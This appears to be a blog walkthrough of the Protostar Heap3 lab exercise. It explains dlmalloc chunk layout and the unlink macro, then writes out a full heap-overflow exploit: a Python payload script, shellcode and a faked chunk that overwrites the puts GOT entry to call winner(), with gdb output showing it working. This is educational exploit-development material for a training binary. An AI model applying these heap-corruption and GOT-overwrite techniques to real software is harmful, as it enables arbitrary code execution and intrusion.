Heap3 speaks to introducing the Doug Lea malloc (dlmalloc
), but the malloc
included with Protostar’s version of the GNU C Library (2.11.2) is based on that implementation so we have been using it all along. The author of the algorithm has written a very informative article on its design and the source code has been made available to the public. While slightly outdated, these are still useful sources of information.
This is going to be a somewhat lengthy post… Let’s start with the source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
void winner()
{
printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
char *a, *b, *c;
a = malloc(32);
b = malloc(32);
c = malloc(32);
strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);
free(c);
free(b);
free(a);
printf("dynamite failed?\n");
}
Reviewing the code provided, it is clear that the challenge is to modify program exeuction such that the winner
function is called. At first glance, there appears to be no obvious way of achieving this. However, the following information provides a starting point:
- we have complete control of input
- we know that
strcpy
is vulnerable to overflows
- we know the size of memory allocated (
32
) and the memory structures
Malloc and Chunks
Before we get started, let’s take a moment to revisit malloc
and the ‘chunks’ it allocates on the heap. Here’s a simplified version of the malloc_chunk
structure definition:
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
};
malloc
always allocates memory blocks in multiples of 8 bytes, which means that the last three bits of the size
field can be used as flags:
0x0000001
: PREV_INUSE (P) – bit is set when the previous chunk is used
0x0000010
: IS_MMAPPED (M) – bit is set if the chunk is mmap
‘d
0x0000100
: NON_MAIN_ARENA (A) – bit is set if the chunk belongs to a thread arena
For example, a size
field set to 0x29
means:
- the previous chunk is in use, as the
PREV_INUSE
flag is set
- the size of the chunk is 40 bytes (
0x28
)
Program Execution
Let’s continue by looking into what the heap looks like under normal program execution, limiting our input to prevent triggering an overflow. To do this, we’ll create an input file and set a breakpoint before the first and last calls to free
. We create a basic python script /tmp/heap3.py
, which we will update with slightly more sophisticated input later:
#!/usr/bin/python
a = "A" * 32
b = "B" * 32
c = "C" * 32
print "%s %s %s" % (a, b, c)
user@protostar:/opt/protostar/bin$ gdb -q heap3
Reading symbols from /opt/protostar/bin/heap3...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048889 <main+0>: push ebp
...
0x08048905 <main+124>: call 0x8048750 <strcpy@plt>
0x0804890a <main+129>: mov eax,DWORD PTR [esp+0x1c]
0x0804890e <main+133>: mov DWORD PTR [esp],eax
0x08048911 <main+136>: call 0x8049824 <free>
...
End of assembler dump.
(gdb) break *0x08048911
Breakpoint 1 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) break *0x0804892e
Breakpoint 2 at 0x804892e: file heap3/heap3.c, line 28.
Then run the program and take a look at the heap:
(gdb) run $(python /tmp/heap3.py)
Starting program: /opt/protostar/bin/heap3 $(python /tmp/heap3.py)
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff7e4) at heap3/heap3.c:24
24 heap3/heap3.c: No such file or directory.
in heap3/heap3.c
(gdb) info proc map
process 2112
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/protostar/bin/heap3
0x804b000 0x804c000 0x1000 0x3000 /opt/protostar/bin/heap3
0x804c000 0x804d000 0x1000 0 [heap]
...
(gdb) x/32x 0x804c000
0x804c000: 0x00000000 0x00000029 0x41414141 0x41414141
0x804c010: 0x41414141 0x41414141 0x41414141 0x41414141
0x804c020: 0x41414141 0x41414141 0x00000000 0x00000029
0x804c030: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c040: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c050: 0x00000000 0x00000029 0x43434343 0x43434343
0x804c060: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c070: 0x43434343 0x43434343 0x00000000 0x00000f89
As expected, we can see the A
‘s (0x41
), B
‘s (0x42
) and C
‘s (0x43
) neatly aligned on the heap. Unless any allocated memory is freed, memory is allocated sequentially on the heap in an orderly manner.
Next, we continue to examine the heap after the calls to free
:
(gdb) c
Continuing.
Breakpoint 2, main (argc=4, argv=0xbffff7d4) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) x/32x 0x804c000
0x804c000: 0x00000000 0x00000029 0x0804c028 0x41414141
0x804c010: 0x41414141 0x41414141 0x41414141 0x41414141
0x804c020: 0x41414141 0x41414141 0x00000000 0x00000029
0x804c030: 0x0804c050 0x42424242 0x42424242 0x42424242
0x804c040: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c050: 0x00000000 0x00000029 0x00000000 0x43434343
0x804c060: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c070: 0x43434343 0x43434343 0x00000000 0x00000f89
We can see that the forward pointers are updated as expected, as indicated by the coloured values. By carefully manipulating input to strcpy
, we should be able to overwrite heap metadata for the next chunk. But how do we use that to our advantage? And why is the PREV_INUSE
flag still set, even after calling free
?
Fastbins
To understand why the PREV_INUSE
flag is not unset, we need to briefly discuss the concept of fastbins. The version of malloc
used here (dlmalloc) includes an optimization where calling free
on chunks smaller than 80 bytes ignores the prev_size
, bk
and the PREV_INUSE
flag. The maximum size for fastbins is defined as follows, and checked when calling free
:
/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE (80 * SIZE_SZ / 4)
That means we’ll need a chunk of size greater than 80 to have these fields and flag updated. Later, we’ll see that this knowledge is needed for a successful exploit.
Understanding the free() Function
At this point, we need to understand some of the implementation details of free
. When free
is called, it will attempt to merge the current chunk with adjacent chunks (provided they are free) to form a larger chunk. At a high level, the free
function performs the following when called:
- Checks that the pointer is valid and of an expected size
- Determines if the chunk is eligible to be placed in a fastbin
- Performs a few checks to avoid a “double free”
- Unlinks the chunk, by updating pointers on adjacent chunks, provided they are free
- Places the chunk in a list of unsorted chunks
The unlink operation above involves writing to memory. First, the chunk needs to be marked as free. Secondly, its links to forwards (fd
) and backwards (bk
) chunks need to be updated. When the unlink operation is performed, the unlink
macro referenced below (simplified) is called, with the following arguments:
- P: The chunk to unlink
- BK: Previous chunk, output
- FD: Next chunk, output
/* Take a chunk off a bin list */
#define unlink(P, BK, FD) {
FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;
}
This operation will make the next available chunk (P->fd
) and the previous chunk (P->bk
) point to eachother. The following writes are performed:
- The value of
P->bk
is written to memory at (P->fd)+12
- 12 bytes offset due to fields
size
(4 bytes), prev_size
(4 bytes) and fd
(4 bytes)
- The value of
P->fd
is written to memory at (P->bk)+8
- 8 bytes offset due to fields
size
(4 bytes) and prev_size
(4 bytes)
This means we can write arbitraty data to these addresses (provided they are writable). Here is a simple visualization of the process, with memory writes highlighted:
+-----------+ +-----------+ +-----------+
| Chunk BK | | Chunk P | | Chunk FD |
+-----------+<--+ +-->+-----------+<--+ +-->+-----------+
| prev_size | | | | prev_size | | | | prev_size |
+-----------+ | | +-----------+ | | +-----------+
| size | | | | size | | | | size |
+-----------+ | | +-----------+ | | +-----------+
| fd +---|--+ | fd +---|--+ | fd |
+-----------+ | +-----------+ | +-----------+
| bk | +------+ bk | +------+ bk |
+-----------+ +-----------+ +-----------+
| ... | | ... | | ... |
+-----------+ +-----------+ +-----------+
| Chunk BK | | Chunk FD | | Chunk P |
+-----------+<--+ +-->+-----------+ +-----------+
| prev_size | | | | prev_size | | prev_size |
+-----------+ | | +-----------+ +-----------+
| size | | | | size | | size |
+-----------+ | | +-----------+ +-----------+
| fd +---|--+ | fd | | fd |
+-----------+ | +-----------+ +-----------+
| bk | +------+ bk | | bk |
+-----------+ +-----------+ +-----------+
| ... | | ... | | ... |
Planning the Exploit
We can now start to plan the exploit.
Because we know of the structure of a chunk and can manipulate the input in any way we like, we can carefully manipulate the content of the chunks on the heap, allowing us to perform writes to memory. More specifically, this allows us to control the values of fd
and bk
, which we will set to specific values for the chunk allocated for b
.
There’s a neat trick that can be used (refer to Vudo malloc tricks section 3.6.1.2), where overwriting the size field to 0xffffffc
(-4) will cause dlmalloc to read the prev_size
field of the second chunk instead of the size
field of next contiguous chunk. Storing an even integer (last bit not set) in this prev_size
field will cause dlmalloc to perform an unlink
. We can leverage this to cause the free
call on c
to perform an unlink operation, with values we control.
- prepare shellcode to call the
winner
function
- inject said shellcode into the chunk allocated for buffer
a
- overflow
b
to manipulate the size of chunk c
to be larger than 80 bytes
- insert a fake chunk “
d
” after c
with 0xfffffffc
size fields
- store the address of an appropriate function in the Global Offset Table in
d->fd
- store the address of our shellcode in
d->bk
Identifying Target Addresses
In earlier exercises, we looked at how we can overwrite the Global Offset Table to manipulate the flow of code execution. Here, our objective is to call the winner
function. In disassembling the main function, we also see that puts
is used and will be called when we reach printf
(refer to Heap1 for additional detials). Let’s find the appropriate addresses:
user@protostar:/opt/protostar/bin$ objdump -t /opt/protostar/bin/heap3 |grep winner
08048864 g F .text 00000025 winner
user@protostar:/opt/protostar/bin$ objdump -R /opt/protostar/bin/heap3 |grep puts
0804b128 R_386_JUMP_SLOT puts
We now have our target addresses:
winner
: 0x08048864
puts
: 0x0804b128
As noted above, an offset of +12 bytes is used for the write operation, so we need to subtract 12 bytes from the puts
address, giving us 0x804b11c
.
Preparing Shellcode
In order to call the winner
function, we need to inject some code into the memory for execution. For this purpose, we need code that achieves the following:
- Move the value
0x08048864
into the eax
register
- Call the
eax
register
This is pretty straight forward:
mov eax, 0x08048864
call eax
… and translates to the following hex string:
"\xb8\x64\x88\x04\x08\xff\xd0"
Exploit Time
Let’s update the python script to with the appropriate input:
#!/usr/bin/python
# Few NOP at the start
a = "\x90" * 12
# Followed by shellcode
a += "\xb8\x64\x88\x04\x08\xff\xd0"
# Overwrite the size of the next chunk to be >80 and have last bit set
# 36 bytes as length is 32 + 4 bytes for prev_size field
# \x55 -> 85 -> 0101 0101
b = "B" * 36 + "\x55"
# We fill C with 76 bytes of junk
# The total length should be 84 (85-1)
c = "C" * 76
# 0xfffffffc (-4) into the prev_size and size fields of a next chunk
c += "\xfc\xff\xff\xff" * 2
# 0x0804b11c: Address of puts in the GOT, with a 12 byte offset
c += "\x1c\xb1\x04\x08"
# 0x0804c008: Address of our shellcode, starting at the heap
# with 8 bytes offset
c += "\x08\xc0\x04\x08"
print "%s %s %s" % (a, b, c)
Back in gdb
, we restart the program:
(gdb) run $(python /tmp/heap3.py)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 $(python /tmp/heap3.py)
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff7a4) at heap3/heap3.c:24
24 in heap3/heap3.c
(gdb) x/48x 0x804c000
0x804c000: 0x00000000 0x00000029 0x90909090 0x90909090
0x804c010: 0x90909090 0x048864b8 0x00d0ff08 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c040: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c050: 0x42424242 0x00000055 0x43434343 0x43434343
0x804c060: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c070: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c080: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c090: 0x43434343 0x43434343 0x43434343 0x43434343
0x804c0a0: 0x43434343 0xfffffffc 0xfffffffc 0x0804b11c
0x804c0b0: 0x0804c008 0x00000000 0x00000000 0x00000000
We see that everything is neatly aligned on the heap as we had planned and continue with program execution:
(gdb) c
Continuing.
Breakpoint 2, main (argc=4, argv=0xbffff7b4) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) c
Continuing.
that wasn't too bad now, was it? @ 1558219801
Program received signal SIGSEGV, Segmentation fault.
0x0804c01b in ?? ()
Neat! Let’s try outside gdb
:
user@protostar:/opt/protostar/bin$ ./heap3 $(python /tmp/heap3.py)
that wasn't too bad now, was it? @ 1558219941
Segmentation fault
Finally!! This exercise took quite a bit of time and effort to get through, but it felt very rewarding once the exploit was working.
References
The following resources are very useful for understanding how to exploit the heap in this manner: